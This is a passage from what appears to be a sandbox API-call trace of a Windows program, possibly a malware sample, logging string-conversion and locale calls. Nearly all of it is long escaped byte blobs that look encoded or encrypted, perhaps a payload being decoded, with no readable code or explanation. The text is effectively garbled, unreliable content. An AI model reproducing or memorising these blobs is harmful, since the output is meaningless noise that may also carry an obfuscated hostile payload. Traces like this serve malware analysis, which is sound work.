x3ad8\xbf5e\x3dd0\x316c\xac57\x2cc7\xbd5f\x29c1\x4fab\x24c8\x24b5\xb0c7\xb136\xfe3e\xc68d\xcd14\xb3bc\x1b44\x76d0\x3be6\x27d3\xb134\x1583\x4945\xb8eb\xb507\xc420\xd5ff\x2cfe\x3d52\xa759\x426d\xa88c\x2d70\x345c\x3457\x70d2\x3002\x343b\xb0b4\x3e48\xed45\x7ed0\xe449\xd5ad\x3014\x6ed3\x6554\x32d9\x918d\x934\x5333\x755a\x2257\xb312\x3002\x2606\x3174\xb5b1\x3150\x7e5b\x3407\x6e8d\x5475\xe513\x718f\x5359\x53ad\x8528\x6d1b\x594b\x3a97\xf3dc\x5442\x3cfb\x3174\xf5d9\x8544\x76a9\x9447\x80c1\x5474\xedef\xcd54\x3399\x9a27\x42f4\xed8f\xa94b\x724e\x9356\x195a\x3417\xf11c\xd49\x3185\x4df3\x7491\x322d\x58f4\xed7f\x3b56\xf3f5\xc22f\x48f4\x3f77\x350a\x725d\x2896\xf0ee\xd054\x7154\x3549\x2a4d\x3512\x11e7\x466c\xfc94\x6d86\x1954\x3699\x82fd\xe331\xed4f\xbd4a\x3297\xf372\x3848\x3796\x8934\x7564\xd945\x7586\x8647\x8609\x8826\xed6e\xf17e\x2758\x69ed\xa19e\x2bf3\xf513\xce5e\x3296\xf00e\x2257\xf050\xf54b\x4362\x3593\x217b\x426c\xc034\x2ef3\x1b40\x3318\x1769\x49f4\xed43\xb14b\x3297\xf3ce\x8042\xf443\xf934\x3589\xf1b5\x3553\x756c\x4679\x9418\x1933\x3b94\xf315\x262c\x8961\x8d33\x358b\xf267\x372\x1c82\x75f6\x2cf4\xfb39\x3105\xf5ef\x8043\x8678\xb421\x2cf3\xf1a4\xcf59\x42ed\x492c\x6c1f\x894b\x735d\x8956\xf017\x7053\x33f4\xf511\x5d45\x3593\x31c7\x46ed\x94e8\x2d33\x7079\xab59\x8278\x8935\x2df3\xf57f\x6255\x3396\x65c2\x3496\xf144\x9553\x3085\xf597\xd847\x866c\x5834\x6c1d\x954\x3399\x4751\x49f4\xed6f\x2d4b\x7293\xf356\xf097\xc442\x31f4\xf5e1\xa545\x3193\x4445\x522c\x9435\x6f5c\xcd54\x72f9\x422d\xb6d4\x2d71\xa147\x3216\x9756\x723f\xcc56\x704a\x3549\x7e0d\x3511\xe7d3\xc66f\x1434\x6e42\xb154\xf3bc\x4248\xb1c\x4133\x760b\xd257\x3356\x3000\x480e\x3175\x55a5\x70f2\x3953\xf48c\x4702\xed24\xd3d1\x6514\xd2a6\x4397\x8c26\x2c31\xca5f\x3092\x3857\x3127\x3857\x3051\x3848\x3020\x3b52\x5138\x472c\x313b\x2c32\x5444\x3258\x273c\x6135\x2dcc\x5059\x3356\x5645\x3143\x5142\x3035\x505c\xbe44\x2352\x3522\x512c\x5550\x2d32\xc378\x9339\xd461\x4974\xcd27\x102b\x14b7\xdf76\x7007\x7156\x51d0\x444d\x7a5d\xed5d\x427\x1f4c\x6738\xd72\xc954\x726b\x232d\xc963\xaf75\x570b\x66e\x7250\x442\x36b6\x9974\x75f3\x7145\x5590\x8d19\xa686\x345d\xb501\x32b4\xd321\x8a1c\x49d4\x7913\x75f6\xce57\x3236\x8c66\x7462\xd034\xdf04\x3025\x5cb2\xfd4f\x605\xf634\x2c53\xd118\x4f00\xefe7\x2254\x4df8\x1517\x627c\x62b6\x50e6\x9e57\x5168\xfd49\x33a5\xd58b\xc247\x42cd\x8076\x2453\x9aac\x3319\x7f4c\xc8c6\x29d3\x9ceb\x3217\xfbe2\x58a2\x55e5\xd130\xc14a\xd1b2\x553c\x884d\x464d\x8a3e\x2cd3\xd110\x634b\x334\x1c34\x7c52\xd5e3\x8e57\x3336\x509e\x3056\x2b9a\x2d29\x2724\x3533\x54ff\x8e2d\x5454\xf539\x3134\x53b1\x322d\x973\x9a33\x7daa\x5036\x55b7\xd084\xd55e\xdd59\x38a9\x4d43\x3633\x4b26\x722d\x5475\x612b\x71ec\x7f6d\x40fe\xe550\x6553\x353f\x3216\xcebe\x3003\x7d46\x7334\xe549\x70b9\x6553\x34a0\x466c\x4140\x2d71\x8098\x7159\xe2d\xb02\xc133\x255a\x3215\x3ce2\x3322\x7646\x3534\x36a9\x62a5\x74fe\x9847\x16b5\x5475\xa9ff\xbd34\x53bb\xc77f\x824\x7933\x55f8\xd156\x3314\xec46\x54af\xf463\x3508\x74a1\xd552\x8d10\x466c\xcb6c\x2d72\x8934\x714e\xf82d\x4435\x13d6\xcaa7\x3c57\x3233\x3f43\x3533\x2135\x342c\x2044\x3436\x35b8\x233f\x5535\x4820\x3055\x564d\x432c\x2c21\xc232\x234a\x3332\x2457\x3127\x3486\x542c\x3448\xcc5c\x3436\x344b\x2337\x5535\x4828\x3055\x5645\xb42c\x49fc\x482e\x1d4a\x2c57\x3233\x2f43\x3533\xf9ea\x1549\x3020\x1452\x3522\x4689\x3116\xd632\x1255\x323c\x42d5\x2c10\x2c32\x506e\x3356\x2270\x3126\x3457\xd725\x1d2b\x7027\x5750\x1583\x7a14\x14a5\xa933\x39b0\x331a\xc230\x3135\x6d7b\x3d4b\x3245\xf276\x3040\x34c2\xbdc3\x547\x30a5\xd292\x2a73\x246c\xfe36\xc9df\xc555\x332d\x36dd\xb134\x2d43\x2649\x3047\x335a\x3052\x7d76\x13d\x3035\xc301\xf951\x7074\x742a\xa4c0\x5969\x4174\x30e\x7e29\x4a2b\x783\x57b3\x138b\x3317\x3b4a\x755e\x5d34\x34f9\xd4d9\x3513\x980d\x465d\x64c4\xe533\x416c\xd03e\x205\xad34\x2d03\x5cb\xe54\x748b\x18fd\x3254\x317b\x9549\x41e7\x5571\xc406\x1863\x5475\x4c4b\x3164\x9e33\x7f1d\x796b\x1d32\x4d4b\x3267\x43aa\x9a43\xc46e\x2935\x1279\x413d\x4153\x3437\xbe2f\x5444\x280b\x3116\x1ce1\x3d\xc134\x5d95\x323d\x3214\x63fc\x2562\xc40a\x755a\x3db8\x81a7\x416c\x3647\x53f\x6448\x9832\xd021\x5f5e\xb26c\x293a\x69f9\xb94c\x3323\x66c5\x30b2\x4f1\x8a34\x3579\x18a\xd653\x442\xb12d\x5404\x6738\x3114\x6646\x421d\x7907\x6a33\x357b\x20c\x5c56\x17\xb756\x3104\x5de\x9a45\x3563\xe1a0\x461d\x648b\xfe33\x3164\x3a2\xb32d\xe431\x3882\x45f3\x4b6e\x8bc7\x31f2\x49a\x8634\xbd5e\x3e14\xbc0e\x64ff\x7b20\x1c35\x22e3\xc8b\x6258\x7c3f\x1935\x1020\xcd4a\x2187\x326b\x88b8\x3569\x608e\x485f\x6047\x844\x6546\xb935\x5509\x3462\x3069\x2908\x4310\x5265\x2c0e\x291a\xfa8\x6257\x45f\x5557\xe3bb\x64dc\xc5b\x6752\xc958\xdb71\x45c\x5913\xb056\x8141\x132e\x7a15\x6532\x354a\xc45b\xdb62\xc724\x7862\xa134\x3509\xd319\x3510\xb54d\x451d\x1830\x2d73\x3175\x18ea\xee4d\x20c3\xad35\xa1bb\x6a6\xe8ee\xa4b2\x3177\xc118\xc448\x545\x3523\x34b6\x76f7\x5444\xad31\xc054\x2259\x425d\x7dc5\xa921\x347b\x386b\x7a1\x16fe\x6116\xa9c6\xc519\x7ddd\x3563\xc4eb\x7218\xa47b\x5c12\x8008\x8633\x76b1\xf99c\x4c55\x75e3\x2e57\x35e6\x4056\x9456\x3304\x254f\x3075\xa6a2\x967b\x466d\x7b78\x2dc3\xafa5\xafe8\x281c\x39f0\xa137\x5d17\x3217\x8312\x5c2b\x18e6\x5b05\xe025\x31f5\x5cb\x6846\x405d\x24e0\x9c33\x23f6\x43b5\x628c\x79a7\x3f68\x3508\x6ed3\x4303\xeb77\x3417\x61f4\xf56c\x3609\x3511\x38fb\xc19d\xd084\xfd33\x7371\xf59\x2b\x2234\x1ec2\x96fa\x8217\x5b65\x3cb2\x7eb\x86fc\x38f9\x2fc\xf0e2\x4537\xfe2f\xbcf1\x2f03\xc162\x3369\x879c\xf9ec\x9c3f\x297c\x9a1a\x3316\x69\xe56\x3104\x500\x9b45\x592\xe147\x461d\x64dd\xd033\x3164\x9eeb\x421d\x725\xea83\x357b\x26e\x9956\x0f\x5556\x3104\x4511\x4344\x3563\xb831\x461d\x5254\x5c33\x42\x8af7\xe418\xf999\x7732\x37fb\x2b26\x751\x6c85\x33a6\x4c3f\x84b\x382\x3663\x70c6\x4209\x60a6\x28b3\x5ed\xf2a9\xa3d2\x49d2\x1799\x35ad\xe36f\x6157\x30a9\xd60e\xcc34\xfc18\xe129\xc652\xe58d\xbf2b\xc9fe\xda32\x8e9e\x32c4\x88d9\x5fd5\x621\x2ffa\x1e0a\x839a\xc759\x356b\x2d85\x3474\x81fd\x84e\x8546\x7b33\xeb35\x3282\x3069\x13e8\x4319\x5415\x2581\x85b7\x4d76\x312b\x12f3\x3562\x3a02\x16f8\x3076\xf822\x215b\x2d5a\x2c58\xbe05\xf864\x70ba\x202d\x793d\x6920\x7504\xffa7\x5825\xa026\xa35e\xd932\x2ebd\xdc8d\x2e0\x5c71\x47dd\x48c5\x5d43\xd154\x335b\x1f41\x4944\xad30\xc44b\x4757\xdb60\x3172\xce52\x4a3c\xed7f\x32b5\x62e2\x4b6\x265c\x6605\x356d\x564\x8d68\x74dc\x7dc5\xdda5\x19d8\x8220\x4ac5\x4192\x843b\xaa84\x3f8\x91b4\x18bb\x34f7\x76b9\xe5e5\x85ae\x31e4\xb5ad\x7286\xf95b\xe9d3\x6bb\x825b\x9f65\x2132\x2056\x720f\xed49\x70d0\xb553\xd783\x466c\xabc0\x9f72\x3e67\x34a8\x731c\x4565\xdbca\x6567\x3217\x7e8\x3072\x56f\x705\x3e98\x778\x4533\x4145\x7010\xe478\xe53c\x5c64\x7e8\xb9dc\x4cb4\x2f03\x5c3\xbe57\x7773\xe845\x4043\x8535\x35b9\x186\xa853\x7416\x4679\x6485\xf433\x3164\x32c\x282d\xe98d\x7cba\x350b\x3292\xde66\x42\x3576\x7166\x2049\x2945\x6581\x74ef\xaa2d\x4c34\x2d35\x11cc\x3f59\x7827\x4534\x2d67\x3447\x3257\x2356\x3044\x5455\x2934\x4549\x310a\x3513\x7a37\x466d\x4730\x6d9b\x3b54\x3559\x423d\x5532\x2b33\x17e1\x3457\x337e\x1e44\x3256\x31d2\xe02f\x6744\x25cb\x5a11\x702d\x54b6\x2c35\x1bf2\x375e\x827e\x1a14\x2dc9\xb478\x7a13\x3772\x3076\x8d0e\x3100\xca2d\xd04f\x3b55\x367d\x1e23\x50b5\x6717\x3168\x5b44\x412d\x2134\x8e32\x611b\x72ee\x2a40\xa604\x785a\x3db2\xc801\x17c4\x3451\xb945\xcb0b\xd338\xa015\xb258\x377f\x695\x6bb4\x1055\xf578\x72ed\xb5a2\x3003\x223e\x34\x6c8a\x38c2\xbd3f\x3dc1\x552d\xd634\xe920") returned 0x22108 [0195.053] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x62843c, cbMultiByte=139529, lpWideCharStr=0x64a554, cchWideChar=279057 | out: lpWideCharStr="\xd2\x2021\x45\x7c\x09\xa5\x47\x37\x2d\x46\x34\xd6\x37\x2d\x64\xce\xa6\x33\x2d\xfa\x34\x71\x1e\x2c\x5b\x75\x53\x0a\x4f\x03\xf2\x30\x26\x3a\x2b\x31\xf3\x3b\x45\x2026\x5a\xf8\x66\x152\x2d\x47\x78\x2122\x12\x79\x3c\x58\x2a\x33\x0d\x32\x46\x26\x54\x5f\x2a\x58\x57\x12\x35\x52\x2c\x5e\x39\x40\x14\x31\x2b\x50\x65\x43\x26\x5b\x67\x5d\x2d\x28\x14\x10\x7c\x7e\x74\x5c\x36\xb3\x49\x27\x1a\x44\x3e\x27\x6f\x31\xe7\x32\x178\xd2\x45\xeb\xdb\xb4\x5d\xb9\x08\x30\x46\x160\xf5\x51\xcf\xb8\x2d\x49\x66\x6c\x5a\x4e\x3c\x30\x4a\x37\x0b\x44\x32\x19\x76\x2d\x4b\x35\x1b\x33\x55\x33\x72\xf7\x52\x18\x62\x34\x5d\xd5\x45\x3e\x52\x3e\xe7\x35\x2b\x46\x34\x201e\x33\xe4\x44\x32\x4c\xdf\x49\x51\x34\x4e\x32\x26\xab\x34\x160\x32\x203a\x32\x49\xef\x56\x37\x35\xd6\x48\x24\x44\x36\x51\x1c\x77\xb4\x29\xc6\x3f\xb4\x17d\xc0\x50\x31\x5b\x31\x25\x42\x32\x49\x32\x11\x4b\x35\xd2\x31\xd4\x37\xc0\x3c\x57\x36\xd0\xe6\x41\x36\x45\x0d\x52\x31\x67\x30\x2d\x2e\xe2\x5e\x32\x29\xef\x30\x79\x33\x17\x72\x35\x68\x33\x1a\x4f\x55\x56\xa5\x73\x1d\x36\x55\x2e\x40\x4d\x31\x46\x2122\x8f\xb1\x0d\xb5\x52\xbd\x58\xc3\x2e\x74\x33\x2d\x54\x51\x77\x57\x4c\x36\x55\x34\x32\x25\x79\x35\x55\xb0\x2b\x32\x44\xbb\x57\xb4\xb2\xf1\xa9\x1b\x37\x42\x21\x56\x47\x3f\xaf\x27\xf4\x66\x3e\xac\x6f\x31\x2022\x38\xed\x4b\x74\xd7\x28\xb5\x4f\x60\x4f\xf2\x5f\x5f\x2dc\x6b\x1c\x16\x37\xf1\x48\xb0\x45\x7e\x1f\x70\x74\x06\x03\x46\x70\x18\x7f\x2d\x19\x62\x0f\x71\xdd\x14\x79\x7f\x03\x2f\x48\x7d\x5f\x8d\x54\x4c\x52\xcf\x29\x24\x4b\x21\x36\x25\x3a\x21\x2c\x25\x78\x3c\x12\x42\x0b\x50\xcc\x12\x50\x0e\x5d\x0c\x29\x7d\x30\x76\x37\x12\x4f\x0a\x53\x0d\x52\xcc\x7d\x34\x69\x30\x0b\x35\x76\x31\x7a\x35\x6c\x31\x78\x30\x12\x42\xcb\x6b\x37\x12\x50\x0e\x5d\x0c\x29\x7d\x30\x76\x37\x12\x4f\x0a\x53\xcd\x69\x37\x7d\x34\x49\x36\x2b\x30\x56\x34\x5a\x30\x4c\x34\x58\x35\xd2\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\x56\x32\x32\x4a\xca\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\x5a\x30\x4c\x34\xb8\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\x56\x32\xd2\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\x5a\x30\xac\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\xb6\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\xba\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\xbd\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\xb6\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\xcc\x32\x43\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\xcb\x2e\x48\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\xce\x46\x32\x32\x43\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\xa9\x2b\x35\x2e\x48\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x22\x4b\x30\x46\x32\x32\x43\x2d\x48\xe5\x201d\x6b\xc7\x78\x67\x24\x33\x42\x30\xe8\xaf\xb4\x2018\x3b\x5d\x7e\x2022\x21\xe9\x47\x0c\x2d\xf1\x44\xf6\x41\x8d\x21\x201c\x2b\x33\xe7\xde\x2022\x3b\x32\x5b\xe9\x47\x57\x19\x32\x90\x30\x27\x4d\x2022\x46\x31\xe9\x10\xe4\x43\x66\xee\xe6\x46\x2f\x26\x34\x58\x6a\x178\xf4\x43\xe2\x2019\x2d\xd6\x46\x4c\xfe\x152\x39\x25\x09\x1a\xf5\x41\x78\x30\x58\x17\x34\x3f\xbe\xd5\x45\x2018\x21\xd1\x2c6\x201d\x5f\x0f\x6b\x7c\x90\x5f\x75\x31\x2f\x69\x2d\x4c") returned 139529 [0195.056] GetUserDefaultLCID () returned 0x409 [0195.057] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18f964, cchData=6 | out: lpLCData="1252") returned 5 [0195.057] SysStringLen (param_1="\xd2\x2021\x45\x7c\x09\xa5\x47\x37\x2d\x46\x34\xd6\x37\x2d\x64\xce\xa6\x33\x2d\xfa\x34\x71\x1e\x2c\x5b\x75\x53\x0a\x4f\x03\xf2\x30\x26\x3a\x2b\x31\xf3\x3b\x45\x2026\x5a\xf8\x66\x152\x2d\x47\x78\x2122\x12\x79\x3c\x58\x2a\x33\x0d\x32\x46\x26\x54\x5f\x2a\x58\x57\x12\x35\x52\x2c\x5e\x39\x40\x14\x31\x2b\x50\x65\x43\x26\x5b\x67\x5d\x2d\x28\x14\x10\x7c\x7e\x74\x5c\x36\xb3\x49\x27\x1a\x44\x3e\x27\x6f\x31\xe7\x32\x178\xd2\x45\xeb\xdb\xb4\x5d\xb9\x08\x30\x46\x160\xf5\x51\xcf\xb8\x2d\x49\x66\x6c\x5a\x4e\x3c\x30\x4a\x37\x0b\x44\x32\x19\x76\x2d\x4b\x35\x1b\x33\x55\x33\x72\xf7\x52\x18\x62\x34\x5d\xd5\x45\x3e\x52\x3e\xe7\x35\x2b\x46\x34\x201e\x33\xe4\x44\x32\x4c\xdf\x49\x51\x34\x4e\x32\x26\xab\x34\x160\x32\x203a\x32\x49\xef\x56\x37\x35\xd6\x48\x24\x44\x36\x51\x1c\x77\xb4\x29\xc6\x3f\xb4\x17d\xc0\x50\x31\x5b\x31\x25\x42\x32\x49\x32\x11\x4b\x35\xd2\x31\xd4\x37\xc0\x3c\x57\x36\xd0\xe6\x41\x36\x45\x0d\x52\x31\x67\x30\x2d\x2e\xe2\x5e\x32\x29\xef\x30\x79\x33\x17\x72\x35\x68\x33\x1a\x4f\x55\x56\xa5\x73\x1d\x36\x55\x2e\x40\x4d\x31\x46\x2122\x8f\xb1\x0d\xb5\x52\xbd\x58\xc3\x2e\x74\x33\x2d\x54\x51\x77\x57\x4c\x36\x55\x34\x32\x25\x79\x35\x55\xb0\x2b\x32\x44\xbb\x57\xb4\xb2\xf1\xa9\x1b\x37\x42\x21\x56\x47\x3f\xaf\x27\xf4\x66\x3e\xac\x6f\x31\x2022\x38\xed\x4b\x74\xd7\x28\xb5\x4f\x60\x4f\xf2\x5f\x5f\x2dc\x6b\x1c\x16\x37\xf1\x48\xb0\x45\x7e\x1f\x70\x74\x06\x03\x46\x70\x18\x7f\x2d\x19\x62\x0f\x71\xdd\x14\x79\x7f\x03\x2f\x48\x7d\x5f\x8d\x54\x4c\x52\xcf\x29\x24\x4b\x21\x36\x25\x3a\x21\x2c\x25\x78\x3c\x12\x42\x0b\x50\xcc\x12\x50\x0e\x5d\x0c\x29\x7d\x30\x76\x37\x12\x4f\x0a\x53\x0d\x52\xcc\x7d\x34\x69\x30\x0b\x35\x76\x31\x7a\x35\x6c\x31\x78\x30\x12\x42\xcb\x6b\x37\x12\x50\x0e\x5d\x0c\x29\x7d\x30\x76\x37\x12\x4f\x0a\x53\xcd\x69\x37\x7d\x34\x49\x36\x2b\x30\x56\x34\x5a\x30\x4c\x34\x58\x35\xd2\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\x56\x32\x32\x4a\xca\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\x5a\x30\x4c\x34\xb8\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\x56\x32\xd2\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\x5a\x30\xac\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\xb6\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\xba\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\xbd\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\xb6\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\xcc\x32\x43\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\xcb\x2e\x48\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\xce\x46\x32\x32\x43\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\xa9\x2b\x35\x2e\x48\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x22\x4b\x30\x46\x32\x32\x43\x2d\x48\xe5\x201d\x6b\xc7\x78\x67\x24\x33\x42\x30\xe8\xaf\xb4\x2018\x3b\x5d\x7e\x2022\x21\xe9\x47\x0c\x2d\xf1\x44\xf6\x41\x8d\x21\x201c\x2b\x33\xe7\xde\x2022\x3b\x32\x5b\xe9\x47\x57\x19\x32\x90\x30\x27\x4d\x2022\x46\x31\xe9\x10\xe4\x43\x66\xee\xe6\x46\x2f\x26\x34\x58\x6a\x178\xf4\x43\xe2\x2019\x2d\xd6\x46\x4c\xfe\x152\x39\x25\x09\x1a\xf5\x41\x78\x30\x58\x17\x34\x3f\xbe\xd5\x45\x2018\x21\xd1\x2c6\x201d\x5f\x0f\x6b\x7c\x90\x5f\x75\x31\x2f\x69\x2d\x4c") returned 0x22108 [0195.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\xd2\x2021\x45\x7c\x09\xa5\x47\x37\x2d\x46\x34\xd6\x37\x2d\x64\xce\xa6\x33\x2d\xfa\x34\x71\x1e\x2c\x5b\x75\x53\x0a\x4f\x03\xf2\x30\x26\x3a\x2b\x31\xf3\x3b\x45\x2026\x5a\xf8\x66\x152\x2d\x47\x78\x2122\x12\x79\x3c\x58\x2a\x33\x0d\x32\x46\x26\x54\x5f\x2a\x58\x57\x12\x35\x52\x2c\x5e\x39\x40\x14\x31\x2b\x50\x65\x43\x26\x5b\x67\x5d\x2d\x28\x14\x10\x7c\x7e\x74\x5c\x36\xb3\x49\x27\x1a\x44\x3e\x27\x6f\x31\xe7\x32\x178\xd2\x45\xeb\xdb\xb4\x5d\xb9\x08\x30\x46\x160\xf5\x51\xcf\xb8\x2d\x49\x66\x6c\x5a\x4e\x3c\x30\x4a\x37\x0b\x44\x32\x19\x76\x2d\x4b\x35\x1b\x33\x55\x33\x72\xf7\x52\x18\x62\x34\x5d\xd5\x45\x3e\x52\x3e\xe7\x35\x2b\x46\x34\x201e\x33\xe4\x44\x32\x4c\xdf\x49\x51\x34\x4e\x32\x26\xab\x34\x160\x32\x203a\x32\x49\xef\x56\x37\x35\xd6\x48\x24\x44\x36\x51\x1c\x77\xb4\x29\xc6\x3f\xb4\x17d\xc0\x50\x31\x5b\x31\x25\x42\x32\x49\x32\x11\x4b\x35\xd2\x31\xd4\x37\xc0\x3c\x57\x36\xd0\xe6\x41\x36\x45\x0d\x52\x31\x67\x30\x2d\x2e\xe2\x5e\x32\x29\xef\x30\x79\x33\x17\x72\x35\x68\x33\x1a\x4f\x55\x56\xa5\x73\x1d\x36\x55\x2e\x40\x4d\x31\x46\x2122\x8f\xb1\x0d\xb5\x52\xbd\x58\xc3\x2e\x74\x33\x2d\x54\x51\x77\x57\x4c\x36\x55\x34\x32\x25\x79\x35\x55\xb0\x2b\x32\x44\xbb\x57\xb4\xb2\xf1\xa9\x1b\x37\x42\x21\x56\x47\x3f\xaf\x27\xf4\x66\x3e\xac\x6f\x31\x2022\x38\xed\x4b\x74\xd7\x28\xb5\x4f\x60\x4f\xf2\x5f\x5f\x2dc\x6b\x1c\x16\x37\xf1\x48\xb0\x45\x7e\x1f\x70\x74\x06\x03\x46\x70\x18\x7f\x2d\x19\x62\x0f\x71\xdd\x14\x79\x7f\x03\x2f\x48\x7d\x5f\x8d\x54\x4c\x52\xcf\x29\x24\x4b\x21\x36\x25\x3a\x21\x2c\x25\x78\x3c\x12\x42\x0b\x50\xcc\x12\x50\x0e\x5d\x0c\x29\x7d\x30\x76\x37\x12\x4f\x0a\x53\x0d\x52\xcc\x7d\x34\x69\x30\x0b\x35\x76\x31\x7a\x35\x6c\x31\x78\x30\x12\x42\xcb\x6b\x37\x12\x50\x0e\x5d\x0c\x29\x7d\x30\x76\x37\x12\x4f\x0a\x53\xcd\x69\x37\x7d\x34\x49\x36\x2b\x30\x56\x34\x5a\x30\x4c\x34\x58\x35\xd2\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\x56\x32\x32\x4a\xca\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\x5a\x30\x4c\x34\xb8\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\x56\x32\xd2\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\x5a\x30\xac\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\x5d\x35\xb6\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\x56\x34\xba\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\x2c\x2c\xbd\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\x2b\x30\xb6\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\x2e\x58\xcc\x32\x43\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\x49\x35\xcb\x2e\x48\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x32\x55\xce\x46\x32\x32\x43\x2b\x48\x2c\x2c\x54\x34\x48\x33\x49\x32\x5d\x31\xa9\x2b\x35\x2e\x48\x2a\x44\x2e\x52\x2a\x46\x2b\x2c\x59\x35\x4b\x32\x22\x4b\x30\x46\x32\x32\x43\x2d\x48\xe5\x201d\x6b\xc7\x78\x67\x24\x33\x42\x30\xe8\xaf\xb4\x2018\x3b\x5d\x7e\x2022\x21\xe9\x47\x0c\x2d\xf1\x44\xf6\x41\x8d\x21\x201c\x2b\x33\xe7\xde\x2022\x3b\x32\x5b\xe9\x47\x57\x19\x32\x90\x30\x27\x4d\x2022\x46\x31\xe9\x10\xe4\x43\x66\xee\xe6\x46\x2f\x26\x34\x58\x6a\x178\xf4\x43\xe2\x2019\x2d\xd6\x46\x4c\xfe\x152\x39\x25\x09\x1a\xf5\x41\x78\x30\x58\x17\x34\x3f\xbe\xd5\x45\x2018\x21\xd1\x2c6\x201d\x5f\x0f\x6b\x7c\x90\x5f\x75\x31\x2f\x69\x2d\x4c", cchWideChar=139528, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 139528 [0195.058] SysStringLen (param_1="\xd2\x2021\x45\x7c\x09\xa5\x47\x37\x2d\x46\x34\xd6\x37\x2d\x64\xce\xa6\x33\x2d\xfa\x34\x71\x1e\x2c\x5b\x75\x53\x0a\x4f\x03\xf2\x30\x26\x3a\x2b\x31\xf3\x3b\x45\x2026\x5a\xf8\x66\x152\x2d\x47\x78\x2122\x12\x79\x3c\x58\x2a\x33\x0d\x32\x46\x26\x54\x5f\x2a\x58\x57\x12\x35\x52\x2c\x5e\x39\x40\x14\x31\x2b\x50\x65\x43\x26\x5b\x67\x5d\x2d\x28\x14\x10\x7c\x7e\x74\x5c\x36\xb3\x49\x27\x1a\x44\x3e\x27\x6f\x31\xe7\x32\x178\xd2\x45\xeb\xdb\xb4\x5d\xb9\x08\x30\x46\x160\xf5\x51\xcf\xb8\x2d\x49\x66\x6c\x5a\x4e\x3c\x30\x4a\x37\x0b\x44\x32\x19\x76\x2d\x4b\x35\x1b\x33\x55\x33\x72\xf7\x52\x18\x62\x34\x5d\xd5\x45\x3e\x52\x3e\xe7\x35\x2b\x46\x34\x201e\x33\xe4\x44\x32\x4c\xdf\x49\x51\x34\x4e\x32\x26\xab\x34\x160\x32\x203a\x32\x49\xef\x56\x37\x35\xd6\x48\x24\x44\x36\x51\x1c\x77\xb4\x29\xc6\x3f\xb4\x17d\xc0\x50\x31\x5b\x31\x25\x42\x32\x49\x32\x11\x4b\x35\xd2\x31\xd4\x37\xc0\x3c\x57\x36\xd0\xe6\x41\x36\x45\x0d\x52\x31\x67\x30\x2d\x2e\xe2\x5e\x32\x29\xef\x30\x79\x33\x17\x72\x35\x68\x33\x1a\x4f\x55\x56\xa5\x73\x1d\x36\x55\x2e\x40\x4d\x31\x46\x2122\x8f\xb1\x0d\xb5\x52\xbd\x58\xc3\x2e\x74\x33\x2d\x54\x51\x77\x57\x4c\x36\x55\x34\x32\x25\x79\x35\x55\xb0\x2b\x32\x44\xbb\x57\xb4\xb2\xf1\xa9\x1b\x37\x42\x21\x56\x47\x3f\xaf\x27\xf4\x66\x3e\xac\x6f\x31\x2022\x38\xed\x4b\x74\xd7\x28\xb5\x4f\x60\x4f\xf2\x5f\x5f\x2dc\x6b\x1c\x16\x37\xf1\x48\xb0